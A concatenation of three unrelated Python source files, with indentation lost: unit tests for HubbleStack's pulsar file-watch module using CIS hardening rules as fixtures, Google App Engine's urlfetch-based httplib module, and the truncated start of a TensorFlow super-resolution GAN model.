try:
var = pulsar._dict_update(dest, upd, recursive_update=True, merge_lists=False)
except TypeError:
pass
def test_dict_update_for_upd_TypeError(self):
dest = {'key_1': 'val_1', 'key_2': 'val_2'}
upd = 'TestValue2'
try:
var = pulsar._dict_update(dest, upd, recursive_update=True, merge_lists=False)
except TypeError:
pass
def test_dict_update_recurssive(self):
ret = {}
dest = {'data':
{'blacklist': {'talk1': {'data': {'Ubuntu-16.04': [{'/etc/inetd.conf': {'pattern': '^talk', 'tag': 'CIS-5.1.4'}}, {'/etc/inetd.conf': {'pattern': '^ntalk', 'tag': 'CIS-5.1.4'}}]}, 'description': 'Ensure talk server is not enabled'}},
'whitelist': {'ssh_ignore_rhosts': {'data': {'Ubuntu-16.04': [{'/etc/ssh/sshd_config': {'pattern': 'IgnoreRhosts', 'tag': 'CIS-9.3.6', 'match_output': 'yes'}}]}, 'description': 'Set SSH IgnoreRhosts to Yes'}}}}
upd = {'data':
{'blacklist': {'talk2': {'data': {'Ubuntu-16.04': [{'/etc/inetd.conf': {'pattern': '^talk', 'tag': 'CIS-5.1.4'}}, {'/etc/inetd.conf': {'pattern': '^ntalk', 'tag': 'CIS-5.1.4'}}]}, 'description': 'Ensure talk server is not enabled'}}}}
data_list = [dest, upd]
for data in data_list:
val = pulsar._dict_update(dest, data, recursive_update=True, merge_lists=True)
assert (len(val['data']['blacklist'])) == 2
def test_process(self):
configfile = 'tests/unittests/resources/hubblestack_pulsar_config.yaml'
verbose = False
def config_get(value, default):
return default
__salt__ = {}
__salt__['config.get'] = config_get
pulsar.__salt__ = __salt__
pulsar.__opts__ = {}
var = pulsar.process(configfile, verbose)
pulsar.__salt__ = {}
assert len(var) == 0
assert isinstance(var, list)
def test_top_result_for_list(self):
topfile = 'tests/unittests/resources/top.pulsar'
def cp_cache_file(value):
return 'tests/unittests/resources/top.pulsar'
def match_compound(value):
return value
__salt__ = {}
__salt__['cp.cache_file'] = cp_cache_file
__salt__['match.compound'] = match_compound
pulsar.__salt__ = __salt__
get_top_data_config = pulsar.get_top_data(topfile)
configs = ['salt://hubblestack_pulsar/' + config.replace('.', '/') + '.yaml'
for config in get_top_data_config]
assert configs[0] == 'salt://hubblestack_pulsar/hubblestack_pulsar_config.yaml'
def test_get_top_data(self):
topfile = 'tests/unittests/resources/top.pulsar'
def cp_cache_file(topfile):
return topfile
def match_compound(value):
return value
__salt__ = {}
__salt__['cp.cache_file'] = cp_cache_file
__salt__['match.compound'] = match_compound
pulsar.__salt__ = __salt__
result = pulsar.get_top_data(topfile)
pulsar.__salt__ = {}
assert isinstance(result, list)
assert result[0] == 'hubblestack_pulsar_config'
def test_get_top_data_for_CommandExecutionError(self):
topfile = '/testfile'
def cp_cache_file(topfile):
return '/testfile'
def match_compound(value):
return value
__salt__ = {}
__salt__['cp.cache_file'] = cp_cache_file
__salt__['match.compound'] = match_compound
pulsar.__salt__ = __salt__
try:
result = pulsar.get_top_data(topfile)
pulsar.__salt__ = {}
except CommandExecutionError:
pass
class TestPulsar2():
tdir = 'blah'
tfile = os.path.join(tdir, 'file')
atdir = os.path.abspath(tdir)
atfile = os.path.abspath(tfile)
def reset(self, **kw):
def config_get(value, default):
return default
if 'paths' not in kw:
kw['paths'] = []
__salt__ = {}
__salt__['config.get'] = config_get
pulsar.__salt__ = __salt__
pulsar.__opts__ = {'pulsar': kw}
pulsar.__context__ = c = {}
self.nuke_tdir()
pulsar._get_notifier() # sets up the dequeue
self.events = []
self.N = c['pulsar.notifier']
self.wm = self.N._watch_manager
self.wm.update_config()
def process(self):
self.events.extend([ "{change}(path)".format(**x) for x in pulsar.process() ])
def nuke_tdir(self):
if os.path.isdir(self.tdir):
shutil.rmtree(self.tdir)
def mk_tdir_and_write_tfile(self, fname=None, to_write='supz\n'):
if fname is None:
fname = self.tfile
if not os.path.isdir(self.tdir):
os.mkdir(self.tdir)
with open(self.tfile, 'w') as fh:
fh.write(to_write)
def mk_subdir_files(self, *f, **kw):
if len(f) == 1 and isinstance(f[0], (list,tuple)):
f = f[0]
for _f in f:
_f = _f if _f.startswith(self.tdir + '/') else os.path.join(self.tdir, _f)
s = _f.split('/')
if s:
fn = s.pop()
b = ''
for i in s:
b = os.path.join(b,i)
if not os.path.isdir(i):
os.mkdir(b)
k = ('{}_out', 'out_{}', '{}_to_write', 'to_write')
for _k in k:
to_write = kw.get(_k.format(fn))
if to_write is not None:
break
if to_write is None:
to_write = 'supz\n'
fn = os.path.join(b, fn)
with open(fn, 'a') as fh:
fh.write(to_write if to_write is not None else 'supz\n')
def more_fname(self, number, base=None):
if base is None:
base = self.tfile
return '{0}_{1}'.format(base, number)
def mk_more_files(self, count=1, to_write='supz-{0}\n'):
for i in range(count):
with open(self.more_fname(i), 'w') as fh:
fh.write(to_write.format(count))
def test_listify_anything(self):
la = pulsar.PulsarWatchManager._listify_anything
def lla(x,e):
assert len( la(x) ) == e
def sla(x,e):
assert str(sorted(la(x))) == str(sorted(e))
lla(None, 0)
lla([None], 0)
lla(set([None]), 0)
lla(set(), 0)
lla([], 0)
lla([[],[],(),{},None,[None]], 0)
m = [[1],[2],(1,),(5),{2},None,[None],{'one':1}]
lla(m, 4)
sla(m, [1,2,5,'one'])
def test_add_watch(self, modality='add-watch'):
o = {}
kw = { self.atdir: o }
if modality in ('watch_new_files', 'watch_files'):
o[modality] = True
self.reset(**kw)
# NOTE: without new_files and/or without watch_files parent_db should
# remain empty, and we shouldn't get a watch on tfile
os.mkdir(self.tdir)
if modality == 'add-watch':
self.wm.add_watch(self.tdir, pulsar.DEFAULT_MASK)
elif modality in ('watch', 'watch_new_files', 'watch_files'):
self.wm.watch(self.tdir)
else:
raise Exception("unknown modality")
self.process()
assert len(self.events) == 0
assert self.wm.watch_db.get(self.tdir) is None
assert self.wm.watch_db.get(self.atdir) > 0
assert len(self.wm.watch_db) == 1
assert not isinstance(self.wm.parent_db.get(self.atdir), set)
self.mk_tdir_and_write_tfile() # write supz to tfile
self.process()
assert len(self.events) == 2
assert self.events[0].startswith('IN_CREATE')
assert self.events[1].startswith('IN_MODIFY')
if modality in ('watch_files', 'watch_new_files'):
assert len(self.wm.watch_db) == 2
assert isinstance(self.wm.parent_db.get(self.atdir), set)
else:
assert len(self.wm.watch_db) == 1
assert not isinstance(self.wm.parent_db.get(self.atdir), set)
self.nuke_tdir()
def test_watch(self):
self.test_add_watch(modality='watch')
def test_watch_new_files(self):
self.test_add_watch(modality='watch_new_files')
def test_recurse_without_watch_files(self):
c1 = {self.atdir: { 'recurse': False }}
c2 = {self.atdir: { 'recurse': True }}
self.reset(**c1)
self.mk_subdir_files('blah1','a/b/c/blah2')
self.wm.watch(self.tdir)
self.wm.prune()
s1 = set(self.wm.watch_db)
self.reset(**c2)
self.mk_subdir_files('blah1','a/b/c/blah2')
self.wm.watch(self.tdir)
self.wm.prune()
s2 = set(self.wm.watch_db)
s0a = set([self.atdir])
s0b = [self.atdir]
for i in 'abc':
s0b.append( os.path.join(s0b[-1], i) )
s0b = set(s0b)
assert s1 == s0a
assert s2 == s0b
def config_make_files_watch_process_reconfig(self, config, reconfig=None, mk_files=0):
'''
create a config (arg0),
make tdir and tfile,
watch the tdir,
store watch_db in s0,
make additional files (default: 0),
execute process(),
store watch_db in s1,
reconfigure using reconfig param (named param or arg1) (default: None)
execute process(),
store watch_db in s2
return s0, s1, s2 as a tuple
'''
self.reset(**config)
self.mk_tdir_and_write_tfile()
self.wm.watch(self.tdir)
s0 = set(self.wm.watch_db)
if mk_files > 0:
self.mk_more_files(count=mk_files)
self.process()
s1 = set(self.wm.watch_db)
if reconfig is None:
del self.wm.cm.nc_config[ self.atdir ]
else:
self.wm.cm.nc_config[ self.atdir ] = reconfig
self.process()
s2 = set(self.wm.watch_db)
return s0,s1,s2
def test_pruning_watch_files_false(self):
s0,s1,s2 = self.config_make_files_watch_process_reconfig({self.atdir:{}}, None, mk_files=2)
assert s0 == set([self.atdir])
assert s1 == set([self.atdir])
assert s2 == set()
def test_pruning_watch_new_files_then_false(self):
c1 = {self.atdir: { 'watch_new_files': True }}
c2 = {self.atdir: { 'watch_new_files': False }}
s0,s1,s2 = self.config_make_files_watch_process_reconfig(c1,c2, mk_files=2)
f1 = self.more_fname(0, base=self.atfile)
f2 = self.more_fname(1, base=self.atfile)
assert s0 == set([self.atdir])
assert s1 == set([self.atdir, f1, f2])
assert s2 == set([self.atdir])
def test_pruning_watch_files_then_false(self):
c1 = {self.atdir: { 'watch_files': True }}
c2 = {self.atdir: { 'watch_files': False }}
s0,s1,s2 = self.config_make_files_watch_process_reconfig(c1,c2, mk_files=2)
f1 = self.more_fname(0, base=self.atfile)
f2 = self.more_fname(1, base=self.atfile)
assert s0 == set([self.atdir, self.atfile])
assert s1 == set([self.atdir, self.atfile, f1, f2])
assert s2 == set([self.atdir])
def test_pruning_watch_new_files_then_nothing(self):
c1 = {self.atdir: { 'watch_new_files': True }}
s0,s1,s2 = self.config_make_files_watch_process_reconfig(c1,None, mk_files=2)
f1 = self.more_fname(0, base=self.atfile)
f2 = self.more_fname(1, base=self.atfile)
assert s0 == set([self.atdir])
assert s1 == set([self.atdir, f1, f2])
assert s2 == set()
def test_pruning_watch_files_then_nothing(self):
c1 = {self.atdir: { 'watch_files': True }}
s0,s1,s2 = self.config_make_files_watch_process_reconfig(c1,None, mk_files=2)
f1 = self.more_fname(0, base=self.atfile)
f2 = self.more_fname(1, base=self.atfile)
assert s0 == set([self.atdir, self.atfile])
assert s1 == set([self.atdir, f1, f2, self.atfile])
assert s2 == set()
|
|
# Copyright 2008 Google Inc. All Rights Reserved.
# Code originally from Ian Bicking
# (http://code.google.com/p/appengine-monkey/).
# Contributed by Ian and subsequently modified here at Google.
"""Copyright 2008 Python Software Foundation, Ian Bicking, and Google."""
import cStringIO
import mimetools
HTTP_PORT = 80
HTTPS_PORT = 443
_UNKNOWN = 'UNKNOWN'
# status codes
# informational
CONTINUE = 100
SWITCHING_PROTOCOLS = 101
PROCESSING = 102
# successful
OK = 200
CREATED = 201
ACCEPTED = 202
NON_AUTHORITATIVE_INFORMATION = 203
NO_CONTENT = 204
RESET_CONTENT = 205
PARTIAL_CONTENT = 206
MULTI_STATUS = 207
IM_USED = 226
# redirection
MULTIPLE_CHOICES = 300
MOVED_PERMANENTLY = 301
FOUND = 302
SEE_OTHER = 303
NOT_MODIFIED = 304
USE_PROXY = 305
TEMPORARY_REDIRECT = 307
# client error
BAD_REQUEST = 400
UNAUTHORIZED = 401
PAYMENT_REQUIRED = 402
FORBIDDEN = 403
NOT_FOUND = 404
METHOD_NOT_ALLOWED = 405
NOT_ACCEPTABLE = 406
PROXY_AUTHENTICATION_REQUIRED = 407
REQUEST_TIMEOUT = 408
CONFLICT = 409
GONE = 410
LENGTH_REQUIRED = 411
PRECONDITION_FAILED = 412
REQUEST_ENTITY_TOO_LARGE = 413
REQUEST_URI_TOO_LONG = 414
UNSUPPORTED_MEDIA_TYPE = 415
REQUESTED_RANGE_NOT_SATISFIABLE = 416
EXPECTATION_FAILED = 417
UNPROCESSABLE_ENTITY = 422
LOCKED = 423
FAILED_DEPENDENCY = 424
UPGRADE_REQUIRED = 426
# server error
INTERNAL_SERVER_ERROR = 500
NOT_IMPLEMENTED = 501
BAD_GATEWAY = 502
SERVICE_UNAVAILABLE = 503
GATEWAY_TIMEOUT = 504
HTTP_VERSION_NOT_SUPPORTED = 505
INSUFFICIENT_STORAGE = 507
NOT_EXTENDED = 510
# Mapping status codes to official W3C names
responses = {
100: 'Continue',
101: 'Switching Protocols',
200: 'OK',
201: 'Created',
202: 'Accepted',
203: 'Non-Authoritative Information',
204: 'No Content',
205: 'Reset Content',
206: 'Partial Content',
300: 'Multiple Choices',
301: 'Moved Permanently',
302: 'Found',
303: 'See Other',
304: 'Not Modified',
305: 'Use Proxy',
306: '(Unused)',
307: 'Temporary Redirect',
400: 'Bad Request',
401: 'Unauthorized',
402: 'Payment Required',
403: 'Forbidden',
404: 'Not Found',
405: 'Method Not Allowed',
406: 'Not Acceptable',
407: 'Proxy Authentication Required',
408: 'Request Timeout',
409: 'Conflict',
410: 'Gone',
411: 'Length Required',
412: 'Precondition Failed',
413: 'Request Entity Too Large',
414: 'Request-URI Too Long',
415: 'Unsupported Media Type',
416: 'Requested Range Not Satisfiable',
417: 'Expectation Failed',
500: 'Internal Server Error',
501: 'Not Implemented',
502: 'Bad Gateway',
503: 'Service Unavailable',
504: 'Gateway Timeout',
505: 'HTTP Version Not Supported',
}
# maximal amount of data to read at one time in _safe_read
MAXAMOUNT = 1048576
# maximal line length when calling readline().
_MAXLINE = 65536
# Can't get this symbol from socket since importing socket causes an import
# cycle though:
# google.net.proto.ProtocolBuffer imports...
# httplib imports ...
# socket imports ...
# remote_socket_service_pb imports ProtocolBuffer
_GLOBAL_DEFAULT_TIMEOUT = object()
class HTTPMessage(mimetools.Message):
# App Engine Note: This class has been copied almost unchanged from
# Python 2.7.2
def addheader(self, key, value):
"""Add header for field key handling repeats."""
prev = self.dict.get(key)
if prev is None:
self.dict[key] = value
else:
combined = ", ".join((prev, value))
self.dict[key] = combined
def addcontinue(self, key, more):
"""Add more field data from a continuation line."""
prev = self.dict[key]
self.dict[key] = prev + "\n " + more
def readheaders(self):
"""Read header lines.
Read header lines up to the entirely blank line that terminates them.
The (normally blank) line that ends the headers is skipped, but not
included in the returned list. If a non-header line ends the headers,
(which is an error), an attempt is made to backspace over it; it is
never included in the returned list.
The variable self.status is set to the empty string if all went well,
otherwise it is an error message. The variable self.headers is a
completely uninterpreted list of lines contained in the header (so
printing them will reproduce the header exactly as it appears in the
file).
If multiple header fields with the same name occur, they are combined
according to the rules in RFC 2616 sec 4.2:
Appending each subsequent field-value to the first, each separated
by a comma. The order in which header fields with the same field-name
are received is significant to the interpretation of the combined
field value.
"""
# XXX The implementation overrides the readheaders() method of
# rfc822.Message. The base class design isn't amenable to
# customized behavior here so the method here is a copy of the
# base class code with a few small changes.
self.dict = {}
self.unixfrom = ''
self.headers = hlist = []
self.status = ''
headerseen = ""
firstline = 1
startofline = unread = tell = None
if hasattr(self.fp, 'unread'):
unread = self.fp.unread
elif self.seekable:
tell = self.fp.tell
while True:
if tell:
try:
startofline = tell()
except IOError:
startofline = tell = None
self.seekable = 0
line = self.fp.readline(_MAXLINE + 1)
if len(line) > _MAXLINE:
raise LineTooLong("header line")
if not line:
self.status = 'EOF in headers'
break
# Skip unix From name time lines
if firstline and line.startswith('From '):
self.unixfrom = self.unixfrom + line
continue
firstline = 0
if headerseen and line[0] in ' \t':
# XXX Not sure if continuation lines are handled properly
# for http and/or for repeating headers
# It's a continuation line.
hlist.append(line)
self.addcontinue(headerseen, line.strip())
continue
elif self.iscomment(line):
# It's a comment. Ignore it.
continue
elif self.islast(line):
# Note! No pushback here! The delimiter line gets eaten.
break
headerseen = self.isheader(line)
if headerseen:
# It's a legal header line, save it.
hlist.append(line)
self.addheader(headerseen, line[len(headerseen)+1:].strip())
continue
else:
# It's not a header line; throw it back and stop here.
if not self.dict:
self.status = 'No headers'
else:
self.status = 'Non-header line where header expected'
# Try to undo the read.
if unread:
unread(line)
elif tell:
self.fp.seek(startofline)
else:
self.status = self.status + '; bad seek'
break
class HTTPResponse:
# App Engine Note: The public interface is identical to the interface provided
# in Python 2.7 except __init__ takes a
# google.appengine.api.urlfetch.Response instance rather than a socket.
def __init__(self,
fetch_response, # App Engine Note: fetch_response was "sock".
debuglevel=0,
strict=0,
method=None,
buffering=False):
self._fetch_response = fetch_response
self.fp = cStringIO.StringIO(fetch_response.content) # For the HTTP class.
self.debuglevel = debuglevel
self.strict = strict
self._method = method
self.msg = None
# from the Status-Line of the response
self.version = _UNKNOWN # HTTP-Version
self.status = _UNKNOWN # Status-Code
self.reason = _UNKNOWN # Reason-Phrase
self.chunked = _UNKNOWN # is "chunked" being used?
self.chunk_left = _UNKNOWN # bytes left to read in current chunk
self.length = _UNKNOWN # number of bytes left in response
self.will_close = _UNKNOWN # conn will close at end of response
def begin(self):
if self.msg is not None:
# we've already started reading the response
return
self.msg = self._fetch_response.header_msg
self.version = 11 # We can't get the real HTTP version so make one up.
self.status = self._fetch_response.status_code
self.reason = responses.get(self._fetch_response.status_code, 'Unknown')
# The following are implementation details and should not be read by
# clients - but set them to reasonable values just in case.
self.chunked = 0
self.chunk_left = None
self.length = None
self.will_close = 1
def close(self):
if self.fp:
self.fp.close()
self.fp = None
def isclosed(self):
return self.fp is None
def read(self, amt=None):
if self.fp is None:
return ''
if self._method == 'HEAD':
self.close()
return ''
if amt is None:
return self.fp.read()
else:
return self.fp.read(amt)
def fileno(self):
raise NotImplementedError('fileno is not supported')
def getheader(self, name, default=None):
if self.msg is None:
raise ResponseNotReady()
return self.msg.getheader(name, default)
def getheaders(self):
"""Return list of (header, value) tuples."""
if self.msg is None:
raise ResponseNotReady()
return self.msg.items()
class HTTPConnection:
# App Engine Note: The public interface is identical to the interface provided
# in Python 2.7.2 but the implementation uses
# google.appengine.api.urlfetch. Some methods are no-ops and set_tunnel
# raises NotImplementedError.
_protocol = 'http' # passed to urlfetch.
_http_vsn = 11
_http_vsn_str = 'HTTP/1.1'
response_class = HTTPResponse
default_port = HTTP_PORT
auto_open = 1
debuglevel = 0
strict = 0
_allow_truncated = True
_follow_redirects = False
def __init__(self, host, port=None, strict=None,
timeout=_GLOBAL_DEFAULT_TIMEOUT, source_address=None):
# net.proto.ProcotolBuffer relies on httplib so importing urlfetch at the
# module level causes a failure on prod. That means the import needs to be
# lazy.
from google.appengine.api import urlfetch
self._fetch = urlfetch.fetch
self._method_map = {
'GET': urlfetch.GET,
'POST': urlfetch.POST,
'HEAD': urlfetch.HEAD,
'PUT': urlfetch.PUT,
'DELETE': urlfetch.DELETE,
'PATCH': urlfetch.PATCH,
}
self.host = host
self.port = port
# With urllib2 in Python 2.6, an object can be passed here.
# The default is set to socket.GLOBAL_DEFAULT_TIMEOUT which is an object.
# We only accept float, int or long values, otherwise it can be
# silently ignored.
if not isinstance(timeout, (float, int, long)):
timeout = None
self.timeout = timeout
# Both 'strict' and 'source_address' are ignored.
self._method = self._url = None
self._body = ''
self.headers = []
def set_tunnel(self, host, port=None, headers=None):
""" Sets up the host and the port for the HTTP CONNECT Tunnelling.
The headers argument should be a mapping of extra HTTP headers
to send with the CONNECT request.
App Engine Note: This method is not supported.
"""
raise NotImplementedError('HTTP CONNECT Tunnelling is not supported')
def set_debuglevel(self, level):
pass
def connect(self):
"""Connect to the host and port specified in __init__.
App Engine Note: This method is a no-op.
"""
def close(self):
"""Close the connection to the HTTP server.
App Engine Note: This method is a no-op.
"""
def send(self, data):
"""Send `data' to the server."""
self._body += data
def putrequest(self, method, url, skip_host=0, skip_accept_encoding=0):
"""Send a request to the server.
`method' specifies an HTTP request method, e.g. 'GET'.
`url' specifies the object being requested, e.g. '/index.html'.
`skip_host' if True does not add automatically a 'Host:' header
`skip_accept_encoding' if True does not add automatically an
'Accept-Encoding:' header
App Engine Note: `skip_host' and `skip_accept_encoding' are not honored by
the urlfetch service.
"""
self._method = method
self._url = url
def putheader(self, header, *values):
"""Send a request header line to the server.
For example: h.putheader('Accept', 'text/html')
"""
hdr = '\r\n\t'.join([str(v) for v in values])
self.headers.append((header, hdr))
def endheaders(self, message_body=None):
"""Indicate that the last header line has been sent to the server.
This method sends the request to the server. The optional
message_body argument can be used to pass message body
associated with the request. The message body will be sent in
the same packet as the message headers if possible. The
message_body should be a string.
"""
if message_body is not None:
self.send(message_body)
def request(self, method, url, body=None, headers=None):
"""Send a complete request to the server."""
self._method = method
self._url = url
try: # 'body' can be a file.
self._body = body.read()
except AttributeError:
self._body = body
if headers is None:
headers = []
elif hasattr(headers, 'items'):
headers = headers.items()
self.headers = headers
def getresponse(self, buffering=False):
"""Get the response from the server.
App Engine Note: buffering is ignored.
"""
# net.proto.ProcotolBuffer relies on httplib so importing urlfetch at the
# module level causes a failure on prod. That means the import needs to be
# lazy.
from google.appengine.api import urlfetch
import socket # Cannot be done at global scope due to circular import.
if self.port and self.port != self.default_port:
host = '%s:%s' % (self.host, self.port)
else:
host = self.host
if not self._url.startswith(self._protocol):
url = '%s://%s%s' % (self._protocol, host, self._url)
else:
url = self._url
headers = dict(self.headers)
if self.timeout in [_GLOBAL_DEFAULT_TIMEOUT,
socket._GLOBAL_DEFAULT_TIMEOUT]:
deadline = socket.getdefaulttimeout()
else:
deadline = self.timeout
try:
method = self._method_map[self._method.upper()]
except KeyError:
raise ValueError('%r is an unrecognized HTTP method' % self._method)
try:
fetch_response = self._fetch(url,
self._body,
method, headers,
self._allow_truncated,
self._follow_redirects,
deadline)
except urlfetch.InvalidURLError, e:
raise InvalidURL(str(e))
except (urlfetch.ResponseTooLargeError, urlfetch.DeadlineExceededError), e:
raise HTTPException(str(e))
except urlfetch.SSLCertificateError, e:
# Should be ssl.SSLError but the ssl module isn't available.
raise HTTPException(str(e))
except urlfetch.DownloadError, e:
# One of the following occured: UNSPECIFIED_ERROR, FETCH_ERROR
raise socket.error(
'An error occured while connecting to the server: %s' % e)
response = self.response_class(fetch_response, method=method)
response.begin()
self.close()
return response
class HTTPSConnection(HTTPConnection):
"This class allows communication via SSL."
# App Engine Note: The public interface is identical to the interface provided
# in Python 2.7.2 but the implementation does not support key and
# certificate files.
_protocol = 'https' # passed to urlfetch.
default_port = HTTPS_PORT
def __init__(self, host, port=None, key_file=None, cert_file=None,
strict=False, timeout=_GLOBAL_DEFAULT_TIMEOUT,
source_address=None):
if key_file is not None or cert_file is not None:
raise NotImplementedError(
'key_file and cert_file arguments are not implemented')
HTTPConnection.__init__(self, host, port, strict, timeout, source_address)
class HTTP:
"Compatibility class with httplib.py from 1.5."
# App Engine Note: The public interface is identical to the interface provided
# in Python 2.7.
_http_vsn = 10
_http_vsn_str = 'HTTP/1.0'
debuglevel = 0
_connection_class = HTTPConnection
def __init__(self, host='', port=None, strict=None):
"Provide a default host, since the superclass requires one."
# some joker passed 0 explicitly, meaning default port
if port == 0:
port = None
# Note that we may pass an empty string as the host; this will throw
# an error when we attempt to connect. Presumably, the client code
# will call connect before then, with a proper host.
self._setup(self._connection_class(host, port, strict))
def _setup(self, conn):
self._conn = conn
# set up delegation to flesh out interface
self.send = conn.send
self.putrequest = conn.putrequest
self.endheaders = conn.endheaders
self.set_debuglevel = conn.set_debuglevel
conn._http_vsn = self._http_vsn
conn._http_vsn_str = self._http_vsn_str
self.file = None
def connect(self, host=None, port=None):
"Accept arguments to set the host/port, since the superclass doesn't."
self.__init__(host, port)
def getfile(self):
"Provide a getfile, since the superclass' does not use this concept."
return self.file
def putheader(self, header, *values):
"The superclass allows only one value argument."
self._conn.putheader(header, '\r\n\t'.join([str(v) for v in values]))
def getreply(self, buffering=False):
"""Compat definition since superclass does not define it.
Returns a tuple consisting of:
- server status code (e.g. '200' if all goes well)
- server "reason" corresponding to status code
- any RFC822 headers in the response from the server
"""
response = self._conn.getresponse()
self.headers = response.msg
self.file = response.fp
return response.status, response.reason, response.msg
def close(self):
self._conn.close()
# note that self.file == response.fp, which gets closed by the
# superclass. just clear the object ref here.
### hmm. messy. if status==-1, then self.file is owned by us.
### well... we aren't explicitly closing, but losing this ref will
### do it
self.file = None
# Copy from Python's httplib implementation.
class HTTPS(HTTP):
"""Compatibility with 1.5 httplib interface
Python 1.5.2 did not have an HTTPS class, but it defined an
interface for sending http requests that is also useful for
https.
"""
# App Engine Note: The public interface is identical to the interface provided
# in Python 2.7 except that key and certificate files are not supported.
_connection_class = HTTPSConnection
def __init__(self, host='', port=None, key_file=None, cert_file=None,
strict=None):
if key_file is not None or cert_file is not None:
raise NotImplementedError(
'key_file and cert_file arguments are not implemented')
# provide a default host, pass the X509 cert info
# urf. compensate for bad input.
if port == 0:
port = None
self._setup(self._connection_class(host, port, key_file,
cert_file, strict))
# we never actually use these for anything, but we keep them
# here for compatibility with post-1.5.2 CVS.
self.key_file = key_file
self.cert_file = cert_file
class HTTPException(Exception):
# App Engine Note: This class has been copied unchanged from Python 2.7.2
# Subclasses that define an __init__ must call Exception.__init__
# or define self.args. Otherwise, str() will fail.
pass
class NotConnected(HTTPException):
# App Engine Note: This class has been copied unchanged from Python 2.7.2
pass
class InvalidURL(HTTPException):
# App Engine Note: This class has been copied unchanged from Python 2.7.2
pass
class UnknownProtocol(HTTPException):
# App Engine Note: This class has been copied unchanged from Python 2.7.2
def __init__(self, version):
self.args = version,
self.version = version
class UnknownTransferEncoding(HTTPException):
# App Engine Note: This class has been copied unchanged from Python 2.7.2
pass
class UnimplementedFileMode(HTTPException):
# App Engine Note: This class has been copied unchanged from Python 2.7.2
pass
class IncompleteRead(HTTPException):
# App Engine Note: This class has been copied unchanged from Python 2.7.2
def __init__(self, partial, expected=None):
self.args = partial,
self.partial = partial
self.expected = expected
def __repr__(self):
if self.expected is not None:
e = ', %i more expected' % self.expected
else:
e = ''
return 'IncompleteRead(%i bytes read%s)' % (len(self.partial), e)
def __str__(self):
return repr(self)
class ImproperConnectionState(HTTPException):
# App Engine Note: This class has been copied unchanged from Python 2.7.2
pass
class CannotSendRequest(ImproperConnectionState):
# App Engine Note: This class has been copied unchanged from Python 2.7.2
pass
class CannotSendHeader(ImproperConnectionState):
# App Engine Note: This class has been copied unchanged from Python 2.7.2
pass
class ResponseNotReady(ImproperConnectionState):
# App Engine Note: This class has been copied unchanged from Python 2.7.2
pass
class BadStatusLine(HTTPException):
# App Engine Note: This class has been copied unchanged from Python 2.7.2
def __init__(self, line):
if not line:
line = repr(line)
self.args = line,
self.line = line
class LineTooLong(HTTPException):
# App Engine Note: This class has been copied unchanged from Python 2.7.2
def __init__(self, line_type):
HTTPException.__init__(self, "got more than %d bytes when reading %s"
% (_MAXLINE, line_type))
# for backwards compatibility
error = HTTPException
class LineAndFileWrapper:
"""A limited file-like object for HTTP/0.9 responses."""
# App Engine Note: This class has been copied unchanged from Python 2.7.2
# The status-line parsing code calls readline(), which normally
# get the HTTP status line. For a 0.9 response, however, this is
# actually the first line of the body! Clients need to get a
# readable file object that contains that line.
def __init__(self, line, file):
self._line = line
self._file = file
self._line_consumed = 0
self._line_offset = 0
self._line_left = len(line)
def __getattr__(self, attr):
return getattr(self._file, attr)
def _done(self):
# called when the last byte is read from the line. After the
# call, all read methods are delegated to the underlying file
# object.
self._line_consumed = 1
self.read = self._file.read
self.readline = self._file.readline
self.readlines = self._file.readlines
def read(self, amt=None):
if self._line_consumed:
return self._file.read(amt)
assert self._line_left
if amt is None or amt > self._line_left:
s = self._line[self._line_offset:]
self._done()
if amt is None:
return s + self._file.read()
else:
return s + self._file.read(amt - len(s))
else:
assert amt <= self._line_left
i = self._line_offset
j = i + amt
s = self._line[i:j]
self._line_offset = j
self._line_left -= amt
if self._line_left == 0:
self._done()
return s
def readline(self):
if self._line_consumed:
return self._file.readline()
assert self._line_left
s = self._line[self._line_offset:]
self._done()
return s
def readlines(self, size=None):
if self._line_consumed:
return self._file.readlines(size)
assert self._line_left
L = [self._line[self._line_offset:]]
self._done()
if size is None:
return L + self._file.readlines()
else:
return L + self._file.readlines(size)
|
|
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Latent-Adversarial Generator.
"""
import functools
import os
import numpy as np
import tensorflow as tf
from absl import app
from absl import flags
from easydict import EasyDict
from libml import data, layers, utils
from libml.layers import conv2d_scaled
from libml.train import TrainSchedule
from libml.train_sr import SRESPro
FLAGS = flags.FLAGS
class LAG(SRESPro):
def stage_scopes(self, stage):
return (['global_step']
+ ['opt_%d/' % x for x in range(stage + 1)]
+ ['sres/stage_%d/' % x for x in range(stage + 1)]
+ ['disc/stage_%d/' % x for x in range(stage + 1)])
def sres(self, x0, colors, lod, lod_min, lod_start, lod_stop, blocks, lfilters, ema=None):
getter = functools.partial(utils.getter_ema, ema) if ema else None
scope_args = dict(custom_getter=getter, reuse=tf.AUTO_REUSE)
lrelu_args = dict(activation=tf.nn.leaky_relu)
relu_args = dict(activation=tf.nn.relu)
with tf.variable_scope('sres', **scope_args):
with tf.variable_scope('stage_0', **scope_args):
y = conv2d_scaled(x0, lfilters[0], 3)
for x in range(blocks):
dy = conv2d_scaled(y, lfilters[0], 3, **relu_args)
y += conv2d_scaled(dy, lfilters[0], 3) / blocks
rgb = []
for stage in range(lod_min, lod_stop + 1):
with tf.variable_scope('stage_%d' % stage, **scope_args):
y = layers.upscale2d(y)
y = conv2d_scaled(y, lfilters[stage], 3, **lrelu_args)
y = conv2d_scaled(y, lfilters[stage], 3, **lrelu_args)
with tf.variable_scope('to_rgb', **scope_args):
rgb.append(conv2d_scaled(y, colors, 3))
im = rgb.pop(0)
for stage in range(lod_min + 1, lod_start + 1):
im = layers.upscale2d(im) + rgb.pop(0)
if lod_start == lod_stop:
return im
return layers.upscale2d(im) + (lod - lod_start) * rgb[-1]
def disc(self, x0, x0_lores_delta, lod, lod_min, lod_start, lod_stop, blocks, lfilters):
leaky_relu = dict(activation=tf.nn.leaky_relu)
def from_rgb(x, stage):
with tf.variable_scope('from_rgb', reuse=tf.AUTO_REUSE):
return conv2d_scaled(x, lfilters[stage], 3, **leaky_relu)
with tf.variable_scope('disc', reuse=tf.AUTO_REUSE):
y = None
for stage in range(lod_stop, lod_min - 1, -1):
with tf.variable_scope('stage_%d' % stage, reuse=tf.AUTO_REUSE):
if stage == lod_stop:
y = from_rgb(x0, stage)
elif stage == lod_start:
